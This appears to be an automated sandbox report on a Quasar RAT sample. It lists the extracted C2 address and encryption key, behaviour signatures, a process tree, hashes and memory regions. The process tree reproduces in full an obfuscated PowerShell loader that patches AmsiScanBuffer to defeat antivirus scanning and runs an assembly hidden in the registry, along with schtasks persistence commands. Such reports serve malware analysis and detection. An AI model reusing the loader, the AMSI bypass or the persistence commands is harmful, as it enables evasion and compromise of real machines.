Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-05-2024 21:00

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 16 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4b61e3c6-b4e8-4f56-9d52-e61965c75a0e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1368
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:680
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:392
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:876
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1108
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1116
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2884
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ngzrdCnZbPdq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WhuSuCleOCNqQU,[Parameter(Position=1)][Type]$AgkspSGlWz)$oKpMpYBjTuP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+[Char](101)+''+'T'+'yp'+'e'+'','C'+'l'+''+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+','+'S'+'e'+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+[Char](97)+'ss'+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$oKpMpYBjTuP.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'ec'+'i'+'al'+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$WhuSuCleOCNqQU).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$oKpMpYBjTuP.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$AgkspSGlWz,$WhuSuCleOCNqQU).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+'a'+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');Write-Output $oKpMpYBjTuP.CreateType();}$RxXQEoUevUHHC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+'2'+'.'+[Char](85)+''+[Char](110)+''+'s'+'a'+'f'+''+[Char](101)+'N'+'a'+''+'t'+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+'e'+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$JjCpbaiGPczMcs=$RxXQEoUevUHHC.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+'A'+[Char](100)+'dre'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YcSMwoaimNyEzmfKaHX=ngzrdCnZbPdq @([String])([IntPtr]);$aMqIOgQWHzNMzVVZbHFCvP=ngzrdCnZbPdq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wRkdBNqCqKi=$RxXQEoUevUHHC.GetMethod(''+'G'+''+[Char](101)+'t'+'M'+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+'ne'+'l'+''+'3'+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$xyGwDThsfiEHUp=$JjCpbaiGPczMcs.Invoke($Null,@([Object]$wRkdBNqCqKi,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$EBkSldReYbYNGiCBx=$JjCpbaiGPczMcs.Invoke($Null,@([Object]$wRkdBNqCqKi,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+'u'+'a'+''+[Char](108)+'P'+'r'+''+'o'+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$oteyAJY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xyGwDThsfiEHUp,$YcSMwoaimNyEzmfKaHX).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'dl'+[Char](108)+'');$SFGMzfFpXisjChIpy=$JjCpbaiGPczMcs.Invoke($Null,@([Object]$oteyAJY,[Object]('A'+'m'+''+'s'+'i'+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$HfCVJRWDHk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EBkSldReYbYNGiCBx,$aMqIOgQWHzNMzVVZbHFCvP).Invoke($SFGMzfFpXisjChIpy,[uint32]8,4,[ref]$HfCVJRWDHk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SFGMzfFpXisjChIpy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EBkSldReYbYNGiCBx,$aMqIOgQWHzNMzVVZbHFCvP).Invoke($SFGMzfFpXisjChIpy,[uint32]8,0x20,[ref]$HfCVJRWDHk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+''+'t'+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3040
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1144
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                      1⤵
                        PID:1156
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1236
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1252
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1340
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1408
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2680
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1416
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1564
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1584
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1648
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1704
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1732
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1768
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1808
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1920
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1980
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:2004
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1472
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:2068
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2148
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2260
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2408
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2564
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2572
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2696
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2720
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2768
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2776
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2804
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2836
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2996
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2796
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3408
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3500
                                                                                    • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1452
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:3608
                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2492
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:2276
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4572
                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:2676
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3640
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3816
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:4000
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3612
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:1204
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:2688
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4420
                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4400
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                              1⤵
                                                                                                PID:2656
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4364
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                  1⤵
                                                                                                    PID:2404
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:1944
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:464
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4112
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:1620
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:1520

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                        Execution

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Persistence

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Privilege Escalation

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Discovery

                                                                                                        Query Registry

                                                                                                        3
                                                                                                        T1012

                                                                                                        System Information Discovery

                                                                                                        3
                                                                                                        T1082

                                                                                                        Peripheral Device Discovery

                                                                                                        1
                                                                                                        T1120

                                                                                                        Command and Control

                                                                                                        Web Service

                                                                                                        1
                                                                                                        T1102

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                          Filesize

                                                                                                          162KB

                                                                                                          MD5

                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                          SHA1

                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                          SHA256

                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                          SHA512

                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                          Filesize

                                                                                                          409KB

                                                                                                          MD5

                                                                                                          a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                          SHA1

                                                                                                          3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                          SHA256

                                                                                                          43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                          SHA512

                                                                                                          458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_3ayq2kix.tyw.ps1
                                                                                                          Filesize

                                                                                                          60B

                                                                                                          MD5

                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                          SHA1

                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                          SHA256

                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                          SHA512

                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                        • memory/316-86-0x00000195C1920000-0x00000195C194B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/316-92-0x00000195C1920000-0x00000195C194B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/316-93-0x00007FFFB5F30000-0x00007FFFB5F40000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/316-94-0x00007FF7CD3F0000-0x00007FF7CD400000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/392-98-0x0000024C12AE0000-0x0000024C12B0B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/624-58-0x00007FF7CD3F0000-0x00007FF7CD400000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/624-56-0x000001B5E94E0000-0x000001B5E950B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/624-50-0x000001B5E94E0000-0x000001B5E950B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/624-57-0x00007FFFB5F30000-0x00007FFFB5F40000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/624-49-0x000001B5E94E0000-0x000001B5E950B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/624-48-0x000001B5E94B0000-0x000001B5E94D5000-memory.dmp
                                                                                                          Filesize

                                                                                                          148KB

                                                                                                        • memory/680-68-0x0000016AE5970000-0x0000016AE599B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/680-69-0x00007FFFB5F30000-0x00007FFFB5F40000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/680-70-0x00007FF7CD3F0000-0x00007FF7CD400000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/680-62-0x0000016AE5970000-0x0000016AE599B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/960-82-0x00007FF7CD3F0000-0x00007FF7CD400000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/960-74-0x000002A97CCD0000-0x000002A97CCFB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/960-80-0x000002A97CCD0000-0x000002A97CCFB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/960-81-0x00007FFFB5F30000-0x00007FFFB5F40000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/1368-37-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1368-45-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1368-44-0x00007FF80BD60000-0x00007FF80BE1E000-memory.dmp
                                                                                                          Filesize

                                                                                                          760KB

                                                                                                        • memory/1368-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1368-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1368-40-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1368-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1368-43-0x00007FF80D370000-0x00007FF80D565000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/1452-7-0x0000000006E00000-0x0000000006E3C000-memory.dmp
                                                                                                          Filesize

                                                                                                          240KB

                                                                                                        • memory/1452-5-0x0000000005BA0000-0x0000000005C06000-memory.dmp
                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/1452-3-0x0000000005AA0000-0x0000000005B32000-memory.dmp
                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/1452-1-0x0000000000FF0000-0x000000000105C000-memory.dmp
                                                                                                          Filesize

                                                                                                          432KB

                                                                                                        • memory/1452-4-0x0000000074B20000-0x00000000752D0000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/1452-6-0x00000000068C0000-0x00000000068D2000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/1452-0-0x0000000074B2E000-0x0000000074B2F000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1452-2-0x0000000005FB0000-0x0000000006554000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.6MB

                                                                                                        • memory/1452-21-0x0000000074B20000-0x00000000752D0000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

